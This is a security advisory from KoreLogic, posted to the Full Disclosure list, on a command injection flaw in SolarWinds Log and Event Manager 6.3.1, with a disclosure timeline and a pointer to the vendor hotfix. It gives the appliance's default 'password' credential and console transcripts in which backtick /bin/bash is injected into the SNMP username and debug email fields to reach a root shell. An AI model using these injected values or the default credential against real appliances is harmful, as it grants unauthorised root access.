[<prev] [next>] [day] [month] [year] [list]
Message-ID: <8705e2a5-c75a-783f-c6c4-f77d67a8935d@korelogic.com>
Date: Mon, 24 Apr 2017 15:52:37 -0500
From: KoreLogic Disclosures <disclosures@...elogic.com>
To: fulldisclosure@...lists.org, bugtraq@...urityfocus.com
Subject: [FD] KL-001-2017-007 : Solarwinds LEM Management Shell Escape via
Command Injection
KL-001-2017-007 : Solarwinds LEM Management Shell Escape via Command Injection
Title: Solarwinds LEM Management Shell Escape via Command Injection
Advisory ID: KL-001-2017-007
Publication Date: 2017.04.24
Publication URL: https://www.korelogic.com/Resources/Advisories/KL-001-2017-007.txt
1. Vulnerability Details
Affected Vendor: Solarwinds
Affected Product: Log and Event Manager Virtual Appliance
Affected Version: v6.3.1
Platform: Embedded Linux
CWE Classification: CWE-78: Improper Neutralization of Special
Elements used in an OS Command
Impact: Privileged Access
Attack vector: SSH
2. Vulnerability Description
Insufficient input validation in the management interface can
be leveraged in order to execute arbitrary commands. This can
lead to (root) shell access to the underlying operating system.
3. Technical Description
Should an attacker gain access to the SSH console for the
cmc user, root access to the underlying operating system can be
achieved. The default password for the cmc user is "password".
This report details two distinct attack vectors: the username
input during SNMP setup and the destination email input
during debug.
============
= SNMP =
============
This is accomplished by placing `/bin/bash` in the username
input during SNMP server setup.
$ ssh cmc@....3.7
Password:
Linux swi-lem 3.2.0-3-amd64 #1 SMP Mon Jul 23 02:45:17 UTC 2012 x86_64
Last login: Sun Dec 11 11:25:07 2016 from 1.3.3.6
//////////////////////////////////////////////////
/// SolarWinds Log & Event Manager ///
/// management console ///
//////////////////////////////////////////////////
Detected VMware Virtual Platform
Product Support Key: RPFYJ-2L3RW-RV5T-GA3K-VLULC-XAPTH
Available commands:
[ appliance ] Network, System
[ manager ] Upgrade, Debug
[ service ] Restrictions, SSH, Snort
[ ndepth ] nDepth Configuration/Maintenance
upgrade Upgrade this Appliance
admin Run Admin UI (for better usability browse https://1.3.3.7/mvc/configuration)
import Import a file that can be used from the Admin UI
help display this help
exit Exit
cmc > service
Available commands:
startssh Start the SSH Service
stopssh Stop the SSH Service
restartssh Restart the SSH Service
restrictssh Restrict Access to the SSH Service (by IP Address/hostname)
unrestrictssh Remove Restrictions on Access to the SSH Service
snmp Configure the SNMP Services
copysnortrules Copy Snort rules to floppy or network share
loadsnortrules Load Snort rules from floppy or network share
loadsnortbackup Load Snort rules from backup
restartsnort Restart the Snort Service
enableflow * Enable the flow Collection Service
disableflow Disable the flow Collection Service
restrictconsole Restrict Access to the Manager Console (GUI) by IP/hostname
unrestrictconsole Remove Restrictions on Access to the Console (GUI)
restrictreports Restrict Access to Reports by IP/hostname
unrestrictreports Remove Restrictions on Access to Reports
stopopsec Stop all running OPSEC LEA client connections
help display this help
exit Return to main menu
NOTE: Commands with an asterisk (*) include an automatic manager service restart
cmc::service > snmp
SNMP Trap Logging Service is RUNNNING
Would you like to STOP the SNMP Trap Logging Service? [Y/n] Y
SNMP Request Service is RUNNNING
Would you like to STOP the SNMP Request Service? [Y/n] Y
The SNMP Trap Logging Service is stopped.
The SNMP Request Service is stopped.
cmc::service > snmp
SNMP Trap Logging Service is DISABLED
Would you like to ENABLE the SNMP Trap Logging Service? [Y/n] Y
SNMP Request Service is DISABLED
Would you like to ENABLE the SNMP Request Service? [Y/n] Y
Enter the port number to access SNMP on LEM (default: 161):
Enter the username to access SNMP on LEM (default: orion): `/bin/bash`
Enter the password hashing algorithm (SHA1, MD5 or NO for no authentication, default: SHA1):
Enter the authentication password (default: orion123):
Enter the communication encryption algorithm (AES128, DES56 or NO for no encryption, default: AES128):
Enter the encryption key (default: orion123):
cmc@...-lem:/usr/local/contego$
============
= Debug =
============
This is accomplished by placing `/bin/bash` in the destination
email input during debug.
$ ssh cmc@....3.7
Password:
Linux swi-lem 3.2.0-3-amd64 #1 SMP Mon Jul 23 02:45:17 UTC 2012 x86_64
Last login: Sun Dec 11 23:57:16 2016 from 1.3.3.6
//////////////////////////////////////////////////
/// SolarWinds Log & Event Manager ///
/// management console ///
//////////////////////////////////////////////////
Detected VMware Virtual Platform
Product Support Key: RPFYJ-2L3RW-RV5T-GA3K-VLULC-XAPTH
Available commands:
[ appliance ] Network, System
[ manager ] Upgrade, Debug
[ service ] Restrictions, SSH, Snort
[ ndepth ] nDepth Configuration/Maintenance
upgrade Upgrade this Appliance
admin Run Admin UI (for better usability browse https://1.3.3.7/mvc/configuration)
import Import a file that can be used from the Admin UI
help display this help
exit Exit
cmc > manager
Available commands:
actortoolupgrade * Upgrade your Manager's Actor Tools (CD/floppy)
archiveconfig Set your Manager Database Archive Schedule/Settings
backupconfig Set your Manager Backup Schedule/Settings
cleanagentconfig Reconfigure the agent on this box to a new manager
configurendepth * Configure the manager to use an nDepth server.
confselfsignedcert * Configure the manager to use a self signed certificate
dbrestart Restart database
debug Send Debugging Information to an Alternate Address
disabletls Disable TLS for DB connections
enabletls Enable TLS for DB connections
exportcert Export the CA certificate for console
exportcertrequest Export a certificate request for signing by CA
hotfix Install LEM hotfix.
importcert * Import a certificate used for console communication
importl4ca * Import a CA of the other node in L4 configuration
licenseupgrade * Upgrade your Manager License (CD/floppy/network)
logbackupconfig Set your Manager Log Backup Schedule/Settings
resetadmin Reset the "admin" user password to default
restart * Restart Manager Service
sensortoolupgrade Upgrade your Manager and Agent Sensor Tools (CD/floppy)
showlog Show Manager Log File
showmanagermem Show the memory setting of SolarWinds manager
start Start Manager Service
stop * Stop Manager Service
support Send Debugging Information to Tech Support @trigeo.com
togglehttp * Enable or disable HTTP (port 80).
viewsysinfo Show information about machine and SolarWinds manager
watchlog Watch Manager Log File
exit Return to main menu
NOTE: Commands with an asterisk (*) include an automatic manager service restart
cmc::manager > debug
Press <enter> to capture debugging information
You will need to provide an SMTP server or Windows File Sharing Credentials
Collecting general system information......UpdateInfo failed: VMware Guest API is not enabled on the host
UpdateInfo failed: VMware Guest API is not enabled on the host
UpdateInfo failed: VMware Guest API is not enabled on the host
UpdateInfo failed: VMware Guest API is not enabled on the host
UpdateInfo failed: VMware Guest API is not enabled on the host
UpdateInfo failed: VMware Guest API is not enabled on the host
.e.sudo: unable to resolve host swi-lem
sudo: unable to resolve host swi-lem
.cat: /etc/hosts: No such file or directory
done.
sudo: unable to resolve host swi-lem
E-Mail/Network share/Quit? (e/n/q) e
E-Mail/Network share/Quit? (e/n/q) e
Please enter the e-mail recipient:
(e.g. support@...geo.com)
> `/bin/bash >&2`
Is the e-mail address <`/bin/bash >&2`> correct? <Y/n> Y
Please enter the name this message should appear from
(e.g. Someone Important)
> Test
Is the name Test correct? <Y/n> Y
Please enter the e-mail address this message should appear from
(e.g. someone@...geo.com)
> fake@...alhost
Is the e-mail address fake@...alhost correct? <Y/n> Y
Please enter the SMTP server you wish to send mail through
(e.g. smtp.yournetwork.com)
> 127.0.0.1
Is the SMTP server 127.0.0.1 correct? <Y/n> Y
Please enter the name of your company
(e.g. Initech, Post Falls branch or Veridian Dynamics)
> Test
Is the company Test correct? <Y/n> Y
Please enter a phone number where you can be reached
(e.g. 509.555.1234)
> Test
Is the number Test correct? <Y/n> Y
--(0)-[1.3.3.7]-[6.3.1]-[root@...-lem]--
/tmp # id
uid=0(root) gid=0(root) groups=0(root)
--(0)-[1.3.3.7]-[6.3.1]-[root@...-lem]--
4. Mitigation and Remediation Recommendation
The vendor has released a Hotfix to remediate this
vulnerability. Hotfix and installation instructions are
available at:
https://thwack.solarwinds.com/thread/111223
5. Credit
This vulnerability was discovered by Matt Bergin (@thatguylevel)
and Hank Leininger of KoreLogic, Inc.
6. Disclosure Timeline
2017.02.16 - KoreLogic sends vulnerability report and PoC to
Solarwinds <psirt@...arwinds.com> using PGP key
with fingerprint
A86E 0CF6 9665 0C8C 8A7C C9BA B373 8E9F 951F 918F.
2017.02.20 - Solarwinds replies that the key is no longer in
use, requests alternate communication channel.
2017.02.22 - KoreLogic submits vulnerability report and PoC to
alternate Solarwinds contact.
2017.02.23 - Solarwinds confirms receipt of vulnerability
report.
2017.04.06 - 30 business days have elapsed since Solarwinds
acknowledged receipt of vulnerability details.
2017.04.11 - Solarwinds releases hotfix and public disclosure.
2017.04.24 - KoreLogic public disclosure.
7. Proof of Concept
See 3. Technical Description
The contents of this advisory are copyright(c) 2017
KoreLogic, Inc. and are licensed under a Creative Commons
Attribution Share-Alike 4.0 (United States) License:
http://creativecommons.org/licenses/by-sa/4.0/
KoreLogic, Inc. is a founder-owned and operated company with a
proven track record of providing security services to entities
ranging from Fortune 500 to small and mid-sized companies. We
are a highly skilled team of senior security consultants doing
by-hand security assessments for the most important networks in
the U.S. and around the world. We are also developers of various
tools and resources aimed at helping the security community.
https://www.korelogic.com/about-korelogic.html
Our public vulnerability disclosure policy is available at:
https://www.korelogic.com/KoreLogic-Public-Vulnerability-Disclosure-Policy.v2.2.txt
Download attachment "signature.asc" of type "application/pgp-signature" (526 bytes)
_______________________________________________
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/
Powered by blists - more mailing lists